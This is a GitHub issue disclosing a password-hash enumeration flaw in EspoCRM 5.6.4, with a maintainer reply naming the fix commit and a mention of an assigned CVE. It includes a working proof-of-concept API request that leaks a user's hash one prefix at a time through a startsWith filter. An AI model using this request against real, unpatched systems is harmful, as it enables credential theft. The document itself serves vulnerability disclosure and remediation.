Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Current version of EspoCRM 5.6.4 is vulnerable to user's password hash enumeration. Malicious authenticated attacker can bruteforce user password hash by 1 symbol at a time using specially crafted filters.
Make a following request in your browser:
http://<HOSTNAME>/api/v1/User?filterList%5B%5D=internal&select=salutationName%2CfirstName%2ClastName%2Cname%2CuserName%2Ctitle%2CemailAddressIsOptedOut%2CemailAddress%2CemailAddressData%2CisActive&maxSize=20&offset=0&orderBy=userName&order=asc&where%5B0%5D%5Btype%5D=startsWith&where%5B0%5D%5Battribute%5D=password&where%5B0%5D%5Bvalue%5D=AAAA
If user password hash starts with "AAAA" the request will result with information about this user, if not - the result will be empty.
The text was updated successfully, but these errors were encountered:
Thanks. It's a recent regression. Fix: 5b8dba6
Sorry, something went wrong.
https://nvd.nist.gov/vuln/detail/CVE-2019-14351 has been assigned for this issue.
No branches or pull requests
Description
Current version of EspoCRM 5.6.4 is vulnerable to user's password hash enumeration. Malicious authenticated attacker can bruteforce user password hash by 1 symbol at a time using specially crafted filters.
PoC
Make a following request in your browser:
If user password hash starts with "AAAA" the request will result with information about this user, if not - the result will be empty.
The text was updated successfully, but these errors were encountered: